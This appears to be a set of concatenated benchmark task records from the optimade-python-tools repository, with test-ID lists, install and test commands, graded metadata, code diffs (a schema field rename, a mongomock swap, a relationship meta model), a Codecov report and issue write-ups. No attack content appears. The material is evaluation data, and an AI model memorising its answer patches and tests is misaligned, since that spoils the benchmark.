[ "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_repr", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_empty", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_property_names", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_number_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_operators", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_id", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_operations", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_list_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_precedence", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_special_cases", "tests/server/routers/test_structures.py::TestStructuresEndpoint::test_response_okay", "tests/server/routers/test_structures.py::TestStructuresEndpoint::test_meta_response", "tests/server/routers/test_structures.py::TestStructuresEndpoint::test_serialize_response", "tests/server/routers/test_structures.py::TestStructuresEndpoint::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestStructuresEndpoint::test_get_next_responses", "tests/server/routers/test_structures.py::TestSingleStructureEndpoint::test_response_okay", "tests/server/routers/test_structures.py::TestSingleStructureEndpoint::test_meta_response", "tests/server/routers/test_structures.py::TestSingleStructureEndpoint::test_serialize_response", "tests/server/routers/test_structures.py::TestSingleStructureEndpoint::test_structures_endpoint_data", "tests/server/routers/test_structures.py::test_check_response_single_structure", "tests/server/routers/test_structures.py::TestMissingSingleStructureEndpoint::test_response_okay", "tests/server/routers/test_structures.py::TestMissingSingleStructureEndpoint::test_meta_response", "tests/server/routers/test_structures.py::TestMissingSingleStructureEndpoint::test_serialize_response", "tests/server/routers/test_structures.py::TestMissingSingleStructureEndpoint::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestSingleStructureWithRelationships::test_response_okay", "tests/server/routers/test_structures.py::TestSingleStructureWithRelationships::test_meta_response", "tests/server/routers/test_structures.py::TestSingleStructureWithRelationships::test_serialize_response", "tests/server/routers/test_structures.py::TestSingleStructureWithRelationships::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestMultiStructureWithSharedRelationships::test_response_okay", "tests/server/routers/test_structures.py::TestMultiStructureWithSharedRelationships::test_meta_response", "tests/server/routers/test_structures.py::TestMultiStructureWithSharedRelationships::test_serialize_response", "tests/server/routers/test_structures.py::TestMultiStructureWithSharedRelationships::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestMultiStructureWithRelationships::test_response_okay", "tests/server/routers/test_structures.py::TestMultiStructureWithRelationships::test_meta_response", "tests/server/routers/test_structures.py::TestMultiStructureWithRelationships::test_serialize_response", "tests/server/routers/test_structures.py::TestMultiStructureWithRelationships::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestMultiStructureWithOverlappingRelationships::test_response_okay", "tests/server/routers/test_structures.py::TestMultiStructureWithOverlappingRelationships::test_meta_response", "tests/server/routers/test_structures.py::TestMultiStructureWithOverlappingRelationships::test_serialize_response", "tests/server/routers/test_structures.py::TestMultiStructureWithOverlappingRelationships::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsDoNotMatchNegatedFilters::test_response_okay", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsDoNotMatchNegatedFilters::test_meta_response", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsDoNotMatchNegatedFilters::test_serialize_response", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsDoNotMatchNegatedFilters::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsMatchUnknownFilter::test_response_okay", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsMatchUnknownFilter::test_meta_response", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsMatchUnknownFilter::test_serialize_response", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsMatchUnknownFilter::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestStructuresWithUnknownResponseFields::test_response_okay", "tests/server/routers/test_structures.py::TestStructuresWithUnknownResponseFields::test_meta_response", "tests/server/routers/test_structures.py::TestStructuresWithUnknownResponseFields::test_serialize_response", "tests/server/routers/test_structures.py::TestStructuresWithUnknownResponseFields::test_structures_endpoint_data", "tests/server/test_client.py::test_client_endpoints[False]", "tests/server/test_client.py::test_client_endpoints[True]", "tests/server/test_client.py::test_filter_validation[True]", "tests/server/test_client.py::test_filter_validation[False]", "tests/server/test_client.py::test_client_response_fields[True]", "tests/server/test_client.py::test_client_response_fields[False]", "tests/server/test_client.py::test_multiple_base_urls[True]", "tests/server/test_client.py::test_multiple_base_urls[False]", "tests/server/test_client.py::test_include_exclude_providers[True]", "tests/server/test_client.py::test_include_exclude_providers[False]", "tests/server/test_client.py::test_client_sort[True]", "tests/server/test_client.py::test_client_sort[False]", "tests/server/test_client.py::test_command_line_client[True]", "tests/server/test_client.py::test_command_line_client[False]", "tests/server/test_client.py::test_command_line_client_silent[True]", "tests/server/test_client.py::test_command_line_client_silent[False]", "tests/server/test_client.py::test_command_line_client_multi_provider[True]", "tests/server/test_client.py::test_command_line_client_multi_provider[False]", "tests/server/test_client.py::test_command_line_client_write_to_file[True]", "tests/server/test_client.py::test_command_line_client_write_to_file[False]", "tests/server/test_client.py::test_strict_async[True]", "tests/server/test_client.py::test_strict_async[False]", "tests/server/test_client.py::test_client_global_data_callback[True]", "tests/server/test_client.py::test_client_global_data_callback[False]", "tests/server/test_client.py::test_client_page_skip_callback[True]", "tests/server/test_client.py::test_client_page_skip_callback[False]", "tests/server/test_client.py::test_client_mutable_data_callback[True]", "tests/server/test_client.py::test_client_mutable_data_callback[False]", "tests/server/test_client.py::test_client_asynchronous_write_callback[True]", "tests/server/test_client.py::test_client_asynchronous_write_callback[False]", "tests/server/test_client.py::test_list_properties[True]", "tests/server/test_client.py::test_list_properties[False]", "tests/server/test_client.py::test_binary_search_internals[1_0]", "tests/server/test_client.py::test_binary_search_internals[2_0]", "tests/server/test_client.py::test_binary_search_internals[1_1]", "tests/server/test_client.py::test_binary_search_internals[1_2]", "tests/server/test_client.py::test_binary_search_internals[1_3]", "tests/server/test_client.py::test_binary_search_internals[2_1]", "tests/server/test_client.py::test_binary_search_internals[2_2]", "tests/server/test_client.py::test_binary_search_internals[3]", "tests/server/test_client.py::test_binary_search_internals[4]", "tests/server/test_client.py::test_binary_search_internals[5]", "tests/server/test_client.py::test_binary_search_internals[6]", "tests/server/test_client.py::test_binary_search_internals[7]", "tests/server/test_client.py::test_binary_search_internals[9]", "tests/server/test_client.py::test_binary_search_internals[12]", "tests/server/test_client.py::test_binary_search_internals[14]", "tests/server/test_client.py::test_binary_search_internals[18]", "tests/server/test_client.py::test_binary_search_internals[22]", "tests/server/test_client.py::test_binary_search_internals[27]", "tests/server/test_client.py::test_binary_search_internals[33]", "tests/server/test_client.py::test_binary_search_internals[41]", "tests/server/test_client.py::test_binary_search_internals[51]", "tests/server/test_client.py::test_binary_search_internals[63]", "tests/server/test_client.py::test_binary_search_internals[77]", "tests/server/test_client.py::test_binary_search_internals[95]", "tests/server/test_client.py::test_binary_search_internals[117]", "tests/server/test_client.py::test_binary_search_internals[144]", "tests/server/test_client.py::test_binary_search_internals[177]", "tests/server/test_client.py::test_binary_search_internals[218]", "tests/server/test_client.py::test_binary_search_internals[269]", "tests/server/test_client.py::test_binary_search_internals[331]", "tests/server/test_client.py::test_binary_search_internals[407]", "tests/server/test_client.py::test_binary_search_internals[501]", "tests/server/test_client.py::test_binary_search_internals[616]", "tests/server/test_client.py::test_binary_search_internals[758]", "tests/server/test_client.py::test_binary_search_internals[933]", "tests/server/test_client.py::test_binary_search_internals[1148]", "tests/server/test_client.py::test_binary_search_internals[1412]", "tests/server/test_client.py::test_binary_search_internals[1737]", "tests/server/test_client.py::test_binary_search_internals[2137]", "tests/server/test_client.py::test_binary_search_internals[2630]", "tests/server/test_client.py::test_binary_search_internals[3235]", "tests/server/test_client.py::test_binary_search_internals[3981]", "tests/server/test_client.py::test_binary_search_internals[4897]", "tests/server/test_client.py::test_binary_search_internals[6025]", "tests/server/test_client.py::test_binary_search_internals[7413]", "tests/server/test_client.py::test_binary_search_internals[9120]", "tests/server/test_client.py::test_binary_search_internals[11220]", "tests/server/test_client.py::test_binary_search_internals[13803]", "tests/server/test_client.py::test_binary_search_internals[16982]", "tests/server/test_client.py::test_binary_search_internals[20892]", "tests/server/test_client.py::test_binary_search_internals[25703]", "tests/server/test_client.py::test_binary_search_internals[31622]", "tests/server/test_client.py::test_binary_search_internals[38904]", "tests/server/test_client.py::test_binary_search_internals[47863]", "tests/server/test_client.py::test_binary_search_internals[58884]", "tests/server/test_client.py::test_binary_search_internals[72443]", "tests/server/test_client.py::test_binary_search_internals[89125]", "tests/server/test_client.py::test_binary_search_internals[109647]", "tests/server/test_client.py::test_binary_search_internals[134896]", "tests/server/test_client.py::test_binary_search_internals[165958]", "tests/server/test_client.py::test_binary_search_internals[204173]", "tests/server/test_client.py::test_binary_search_internals[251188]", "tests/server/test_client.py::test_binary_search_internals[309029]", "tests/server/test_client.py::test_binary_search_internals[380189]", "tests/server/test_client.py::test_binary_search_internals[467735]", "tests/server/test_client.py::test_binary_search_internals[575439]", "tests/server/test_client.py::test_binary_search_internals[707945]", "tests/server/test_client.py::test_binary_search_internals[870963]", "tests/server/test_client.py::test_binary_search_internals[1071519]", "tests/server/test_client.py::test_binary_search_internals[1318256]", "tests/server/test_client.py::test_binary_search_internals[1621810]", "tests/server/test_client.py::test_binary_search_internals[1995262]", "tests/server/test_client.py::test_binary_search_internals[2454708]", "tests/server/test_client.py::test_binary_search_internals[3019951]", "tests/server/test_client.py::test_binary_search_internals[3715352]", "tests/server/test_client.py::test_binary_search_internals[4570881]", "tests/server/test_client.py::test_binary_search_internals[5623413]", "tests/server/test_client.py::test_binary_search_internals[6918309]", "tests/server/test_client.py::test_binary_search_internals[8511380]", "tests/server/test_client.py::test_binary_search_internals[10471285]", "tests/server/test_client.py::test_binary_search_internals[12882495]", "tests/server/test_client.py::test_binary_search_internals[15848931]", "tests/server/test_client.py::test_binary_search_internals[19498445]", "tests/server/test_client.py::test_binary_search_internals[23988329]", "tests/server/test_client.py::test_binary_search_internals[29512092]", "tests/server/test_client.py::test_binary_search_internals[36307805]", "tests/server/test_client.py::test_binary_search_internals[44668359]", "tests/server/test_client.py::test_binary_search_internals[54954087]", "tests/server/test_client.py::test_binary_search_internals[67608297]", "tests/server/test_client.py::test_binary_search_internals[83176377]", "tests/server/test_client.py::test_binary_search_internals[102329299]", "tests/server/test_client.py::test_binary_search_internals[125892541]", "tests/server/test_client.py::test_binary_search_internals[154881661]", "tests/server/test_client.py::test_binary_search_internals[190546071]", "tests/server/test_client.py::test_binary_search_internals[234422881]", "tests/server/test_client.py::test_binary_search_internals[288403150]", "tests/server/test_client.py::test_binary_search_internals[354813389]", "tests/server/test_client.py::test_binary_search_internals[436515832]", "tests/server/test_client.py::test_binary_search_internals[537031796]", "tests/server/test_client.py::test_binary_search_internals[660693448]", "tests/server/test_client.py::test_binary_search_internals[812830516]", "tests/server/test_client.py::test_binary_search_internals[1000000000]", "tests/server/test_client.py::test_raw_get_one_sync", "tests/server/test_client.py::test_raw_get_one_async" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/filterparser/test_filterparser.py tests/filtertransformers/test_mongo.py tests/server/routers/test_structures.py tests/server/test_client.py" }
{ "num_modified_files": 2, "num_modified_lines": 6, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.94, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue aims to make the v1.2 grammar the default and relax nested field identifier rules, adding a new provider field for testing. The test suite checks the default variant, parser handling of nested identifiers, Mongo transformer output, server filtering on the new field, client property count, and config inclusion, all directly reflecting the described changes. No evidence of test coupling, implicit naming, external dependencies, ambiguous specifications, unrelated patch artifacts, or hidden domain knowledge is present, so the task is clearly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
61b271d41049de4d5e59c4650c175717ae9d26e7
2019-07-26 12:37:27
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=h1) Report > Merging [#60](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/61b271d41049de4d5e59c4650c175717ae9d26e7?src=pr&el=desc) will **not change** coverage. > The diff coverage is `100%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60/graphs/tree.svg?width=650&token=UJAtmqkZZO&height=150&src=pr)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #60 +/- ## ======================================= Coverage 76.73% 76.73% ======================================= Files 19 19 Lines 649 649 ======================================= Hits 498 498 Misses 151 151 ``` | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/server/models/structures.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60/diff?src=pr&el=tree#diff-b3B0aW1hZGUvc2VydmVyL21vZGVscy9zdHJ1Y3R1cmVzLnB5) | `59.67% <100%> (ø)` | :arrow_up: | | [...imade/filtertransformers/tests/test\_transformer.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL3Rlc3RzL3Rlc3RfdHJhbnNmb3JtZXIucHk=) | `100% <100%> (ø)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=footer). Last update [61b271d...904c084](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
materials-consortia__optimade-python-tools-60
diff --git a/optimade/server/models/structures.py b/optimade/server/models/structures.py index 1ea902a2..3b7a5cd9 100644 --- a/optimade/server/models/structures.py +++ b/optimade/server/models/structures.py @@ -260,7 +260,7 @@ the elements in this list each refer to the direction of the corresponding entry """, ) - lattice_types: Optional[List[conlist(len_eq=3)]] = Schema( + lattice_vectors: Optional[List[conlist(len_eq=3)]] = Schema( ..., description="""List of three lattice vectors in Cartesian coordinates, in ångströms (Å).
Some minor fixes - Fixed a typo in our version of the schema for the field name `lattice_types` -> `lattice_vectors`. - Switched the final test that needed a mongo server running to `mongomock` (I assume this is what we want @dwinston )
**Title** Correct structure schema field name and replace MongoDB dependency in tests **Problem** The structure model exposed a misspelled field name, leading to schema mismatches and validation errors. Additionally, the integration test required a live MongoDB instance, causing failures in environments without the service. **Root Cause** A typographical error defined the field as `lattice_types` instead of the intended `lattice_vectors`, and the test was tightly coupled to a real MongoDB server. **Fix / Expected Behavior** - Expose the correct `lattice_vectors` field in the structure schema. - Ensure the schema description accurately reflects the list of three Cartesian lattice vectors. - Modify the affected test to employ an in‑memory MongoDB mock, removing the external dependency. - All validation and API responses should now include the properly named field. - The test suite runs successfully in CI without requiring a MongoDB server. **Risk & Validation** - Verify that any existing code referencing the old field name is updated to prevent breakage. - Run the full test suite, confirming that the mocked database behavior mirrors the real server for the tested scenarios. - Perform a quick manual API check to ensure the response payload contains `lattice_vectors` with the expected format.
60
Materials-Consortia/optimade-python-tools
diff --git a/optimade/filtertransformers/tests/test_transformer.py b/optimade/filtertransformers/tests/test_transformer.py index fb6a60bb..a51ea683 100644 --- a/optimade/filtertransformers/tests/test_transformer.py +++ b/optimade/filtertransformers/tests/test_transformer.py @@ -2,7 +2,7 @@ import itertools from unittest import TestCase import uuid -from pymongo import MongoClient +from mongomock import MongoClient from optimade.filterparser import LarkParser from optimade.filtertransformers.mongo import MongoTransformer
[ "optimade/filtertransformers/tests/test_transformer.py::TestTransformer::test_conjunctions" ]
[ "optimade/filtertransformers/tests/test_transformer.py::TestTransformer::test_not", "optimade/filtertransformers/tests/test_transformer.py::TestTransformer::test_simple_comparisons" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning optimade/filtertransformers/tests/test_transformer.py" }
{ "num_modified_files": 1, "num_modified_lines": 1, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.94, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug", "dev_ops_enh" ], "reason": null, "reasoning": "The issue requests two concrete changes: rename the schema field from `lattice_types` to `lattice_vectors` and replace the real MongoDB client import with `mongomock` for tests. The provided test patch directly implements the second change and matches the test expectations, while the schema rename is straightforward and implied by the golden patch. There are no hidden dependencies, ambiguous requirements, or mismatches between the tests and the stated intent, so the task is clearly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
c5b579f7a219bbf2e774052cbc71128c1fd82cb0
2020-01-13 11:05:08
materials-consortia__optimade-python-tools-131
diff --git a/openapi/index_openapi.json b/openapi/index_openapi.json index a53f6a6f..3bb04fff 100644 --- a/openapi/index_openapi.json +++ b/openapi/index_openapi.json @@ -606,8 +606,23 @@ }, "description": "A JSON object containing information about an available API version" }, - "BaseResource": { - "title": "BaseResource", + "BaseRealationshipMeta": { + "title": "BaseRealationshipMeta", + "required": [ + "description" + ], + "type": "object", + "properties": { + "description": { + "title": "Description", + "type": "string", + "description": "OPTIONAL human-readable description of the relationship" + } + }, + "description": "Specific meta field for base relationship resource" + }, + "BaseRelationshipResource": { + "title": "BaseRelationshipResource", "required": [ "id", "type" @@ -623,9 +638,18 @@ "title": "Type", "type": "string", "description": "Resource type" + }, + "meta": { + "title": "Meta", + "allOf": [ + { + "$ref": "#/components/schemas/BaseRealationshipMeta" + } + ], + "description": "Relationship meta field. MUST contain 'description' if supplied." } }, - "description": "Minimum requirements to represent a Resource" + "description": "Minimum requirements to represent a relationship resource" }, "EntryRelationships": { "title": "EntryRelationships", @@ -1417,14 +1441,14 @@ { "allOf": [ { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } ] }, { "type": "array", "items": { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } } ], @@ -1440,7 +1464,7 @@ "description": "a meta object that contains non-standard meta-information about the relationship." } }, - "description": "Representation references from the resource object in which it\u2019s defined to other resource objects." + "description": "Similar to normal JSON API relationship, but with addition of OPTIONAL meta field for a resource" }, "RelatedChildResource": { "title": "RelatedChildResource", @@ -1716,14 +1740,14 @@ { "allOf": [ { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } ] }, { "type": "array", "items": { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } } ], @@ -1739,7 +1763,7 @@ "description": "a meta object that contains non-standard meta-information about the relationship." } }, - "description": "Representation references from the resource object in which it\u2019s defined to other resource objects." + "description": "Similar to normal JSON API relationship, but with addition of OPTIONAL meta field for a resource" }, "ToplevelLinks": { "title": "ToplevelLinks", diff --git a/openapi/openapi.json b/openapi/openapi.json index 74477055..5d39877f 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -2342,8 +2342,23 @@ }, "description": "Resource objects appear in a JSON:API document to represent resources." }, - "BaseResource": { - "title": "BaseResource", + "BaseRealationshipMeta": { + "title": "BaseRealationshipMeta", + "required": [ + "description" + ], + "type": "object", + "properties": { + "description": { + "title": "Description", + "type": "string", + "description": "OPTIONAL human-readable description of the relationship" + } + }, + "description": "Specific meta field for base relationship resource" + }, + "BaseRelationshipResource": { + "title": "BaseRelationshipResource", "required": [ "id", "type" @@ -2359,9 +2374,18 @@ "title": "Type", "type": "string", "description": "Resource type" + }, + "meta": { + "title": "Meta", + "allOf": [ + { + "$ref": "#/components/schemas/BaseRealationshipMeta" + } + ], + "description": "Relationship meta field. MUST contain 'description' if supplied." } }, - "description": "Minimum requirements to represent a Resource" + "description": "Minimum requirements to represent a relationship resource" }, "EntryInfoProperty": { "title": "EntryInfoProperty", @@ -3168,14 +3192,14 @@ { "allOf": [ { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } ] }, { "type": "array", "items": { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } } ], @@ -3191,7 +3215,7 @@ "description": "a meta object that contains non-standard meta-information about the relationship." } }, - "description": "Representation references from the resource object in which it\u2019s defined to other resource objects." + "description": "Similar to normal JSON API relationship, but with addition of OPTIONAL meta field for a resource" }, "ReferenceResource": { "title": "ReferenceResource", @@ -3845,14 +3869,14 @@ { "allOf": [ { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } ] }, { "type": "array", "items": { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } } ], @@ -3868,7 +3892,7 @@ "description": "a meta object that contains non-standard meta-information about the relationship." } }, - "description": "Representation references from the resource object in which it\u2019s defined to other resource objects." + "description": "Similar to normal JSON API relationship, but with addition of OPTIONAL meta field for a resource" }, "StructureResource": { "title": "StructureResource", diff --git a/optimade/models/baseinfo.py b/optimade/models/baseinfo.py index 32df32dc..3109b63f 100644 --- a/optimade/models/baseinfo.py +++ b/optimade/models/baseinfo.py @@ -1,3 +1,4 @@ +# pylint: disable=no-self-argument import re from typing import Dict, List, Optional diff --git a/optimade/models/entries.py b/optimade/models/entries.py index 8c854de7..b78bc66d 100644 --- a/optimade/models/entries.py +++ b/optimade/models/entries.py @@ -1,9 +1,10 @@ -# pylint: disable=line-too-long +# pylint: disable=line-too-long,no-self-argument from datetime import datetime from typing import Optional, Dict, List from pydantic import BaseModel, Field, validator -from .jsonapi import Relationships, Attributes, Resource, Relationship +from .jsonapi import Relationships, Attributes, Resource +from .optimade_json import Relationship __all__ = ( diff --git a/optimade/models/jsonapi.py b/optimade/models/jsonapi.py index 5767a65a..05ab1a72 100644 --- a/optimade/models/jsonapi.py +++ b/optimade/models/jsonapi.py @@ -1,6 +1,7 @@ """This module should reproduce JSON API v1.0 https://jsonapi.org/format/1.0/""" -from typing import Optional, Set, Union, Any, List -from pydantic import BaseModel, AnyUrl, Field, validator, root_validator +# pylint: disable=no-self-argument +from typing import Optional, Set, Union, List +from pydantic import BaseModel, AnyUrl, Field, root_validator __all__ = ( diff --git a/optimade/models/links.py b/optimade/models/links.py index d6409468..0e1c34c2 100644 --- a/optimade/models/links.py +++ b/optimade/models/links.py @@ -1,3 +1,4 @@ +# pylint: disable=no-self-argument from pydantic import Field, AnyUrl, validator, root_validator from typing import Union diff --git a/optimade/models/optimade_json.py b/optimade/models/optimade_json.py index a3263ca7..55c0dda5 100644 --- a/optimade/models/optimade_json.py +++ b/optimade/models/optimade_json.py @@ -1,11 +1,20 @@ """Modified JSON API v1.0 for OPTiMaDe API""" -from pydantic import Field, validator, root_validator -from typing import Optional, Set +# pylint: disable=no-self-argument +from pydantic import Field, root_validator, BaseModel +from typing import Optional, Set, Union, List from . import jsonapi -__all__ = ("Error", "Failure", "Success", "Warnings") +__all__ = ( + "Error", + "Failure", + "Success", + "Warnings", + "BaseRealationshipMeta", + "BaseRelationshipResource", + "Relationship", +) class Error(jsonapi.Error): @@ -91,3 +100,28 @@ class Warnings(Error): if values.get("status", None) is not None: raise ValueError("status MUST NOT be specified for warnings") return values + + +class BaseRealationshipMeta(BaseModel): + """Specific meta field for base relationship resource""" + + description: str = Field( + ..., description="OPTIONAL human-readable description of the relationship" + ) + + +class BaseRelationshipResource(jsonapi.BaseResource): + """Minimum requirements to represent a relationship resource""" + + meta: Optional[BaseRealationshipMeta] = Field( + None, + description="Relationship meta field. MUST contain 'description' if supplied.", + ) + + +class Relationship(jsonapi.Relationship): + """Similar to normal JSON API relationship, but with addition of OPTIONAL meta field for a resource""" + + data: Optional[ + Union[BaseRelationshipResource, List[BaseRelationshipResource]] + ] = Field(None, description="Resource linkage") diff --git a/optimade/models/references.py b/optimade/models/references.py index 27e8acd2..9198cce6 100644 --- a/optimade/models/references.py +++ b/optimade/models/references.py @@ -1,3 +1,4 @@ +# pylint: disable=line-too-long,no-self-argument from pydantic import Field, BaseModel, AnyUrl, validator from typing import List, Optional diff --git a/optimade/models/toplevel.py b/optimade/models/toplevel.py index 10ef0603..9160d4c8 100644 --- a/optimade/models/toplevel.py +++ b/optimade/models/toplevel.py @@ -1,14 +1,7 @@ from datetime import datetime from typing import Union, List, Optional, Dict, Any -from pydantic import ( # pylint: disable=no-name-in-module - BaseModel, - validator, - AnyUrl, - AnyHttpUrl, - Field, - EmailStr, -) +from pydantic import BaseModel, AnyHttpUrl, Field, EmailStr from .jsonapi import Link, Meta from .utils import NonnegativeInt
Add meta.description to BaseRelationshipResource Sub-classed BaseResource to introduce special OPTiMaDe requirement of having an OPTIONAL `meta` field in the relationship resource, which MUST have the field `description`, it it's present. Also, introduced some pylint disables for the models to avoid pylint complaining about long lines and wrong use of `self` for validators (which are class methods, hence they should NOT have the `self` argument).
**Title** Add optional `meta.description` support to relationship resources **Problem** OPTiMaDe relationship objects must be able to include an optional `meta` object that contains a `description` field. The existing models and OpenAPI schema did not provide this field, leading to non‑compliant responses. **Root Cause** The generic base resource used for relationships lacked a dedicated meta definition, and the OpenAPI specifications still referenced the generic resource schema. **Fix / Expected Behavior** - Introduce a dedicated meta schema for relationships with a required `description` property. - Extend the base relationship resource model to expose an optional `meta` field of the new schema type. - Update the relationship model to use the extended resource type for its `data` field. - Revise the OpenAPI definitions to reference the new relationship resource and meta schemas. - Add pylint disables for validator signatures that intentionally omit `self`. **Risk & Validation** - Verify that existing endpoints continue to return valid JSON API responses when the `meta` field is omitted. - Confirm that responses including the optional `meta.description` pass schema validation against the updated OpenAPI spec. - Run the full test suite and linting to ensure no new warnings or errors are introduced.
131
Materials-Consortia/optimade-python-tools
